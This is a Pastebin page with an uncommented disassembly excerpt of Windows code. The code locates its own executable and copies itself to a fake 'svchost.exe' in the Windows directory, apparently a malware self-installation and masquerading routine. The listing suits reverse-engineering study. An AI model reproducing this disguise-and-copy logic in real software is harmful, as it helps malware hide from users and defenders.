API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 19th, 2015
41
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 2.90 KB | None | 0 0
raw download clone embed print report
  1. .text:151125DA                 push    104h            ; uSize
  2. .text:151125DF                 push    offset PathName ; lpBuffer
  3. .text:151125E4                 call    ds:GetSystemDirectoryA
  4. .text:151125EA                 push    104h            ; nSize
  5. .text:151125EF                 push    offset String   ; lpFilename
  6. .text:151125F4                 push    0               ; lpModuleName
  7. .text:151125F6                 call    ds:GetModuleHandleA
  8. .text:151125FC                 push    eax             ; hModule
  9. .text:151125FD                 call    ds:GetModuleFileNameA
  10. .text:15112603                 push    offset PathName ; lpString2
  11. .text:15112608                 push    offset Data     ; lpString1
  12. .text:1511260D                 call    ds:lstrcpyA
  13. .text:15112613                 mov     esi, ds:lstrcatA
  14. .text:15112619                 push    offset asc_15111570 ; "\\"
  15. .text:1511261E                 push    offset Data     ; lpString1
  16. .text:15112623                 call    esi ; lstrcatA
  17. .text:15112625                 push    offset a__Svchost_exe ; "..\\svchost.exe"
  18. .text:1511262A                 push    offset Data     ; lpString1
  19. .text:1511262F                 call    esi ; lstrcatA
  20. .text:15112631                 push    offset sub_151133F0
  21. .text:15112636                 call    sub_15113B70
  22. .text:1511263B                 add     esp, 4
  23. .text:1511263E                 test    eax, eax
  24. .text:15112640                 jnz     short loc_15112648
  25. .text:15112642                 push    eax
  26. .text:15112643                 call    sub_151133F0
  27. .text:15112648 ; ---------------------------------------------------------------------------
  28. .text:15112648
  29. .text:15112648 loc_15112648:                           ; CODE XREF: start+90j
  30. .text:15112648                 push    offset Data     ; lpString
  31. .text:1511264D                 call    sub_15113FA0
  32. .text:15112652                 add     esp, 4
  33. .text:15112655                 push    eax             ; lpString2
  34. .text:15112656                 push    offset String   ; lpString
  35. .text:1511265B                 call    sub_15113FA0
  36. .text:15112660                 add     esp, 4
  37. .text:15112663                 push    eax             ; lpString1
  38. .text:15112664                 call    ds:lstrcmpA
  39. .text:1511266A                 test    eax, eax
  40. .text:1511266C                 jz      short loc_15112680
  41. .text:1511266E                 push    0               ; bFailIfExists
  42. .text:15112670                 push    offset Data     ; lpNewFileName
  43. .text:15112675                 push    offset String   ; lpExistingFileName
  44. .text:1511267A                 call    ds:CopyFileA
  45. .text:15112680
  46. .text:15112680 loc_15112680:                           ; CODE XREF: start+1Dj
  47. .text:15112680                                         ; start+BCj
  48. .text:15112680                 push    0               ; uExitCode
  49. .text:15112682                 call    ds:ExitProcess
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!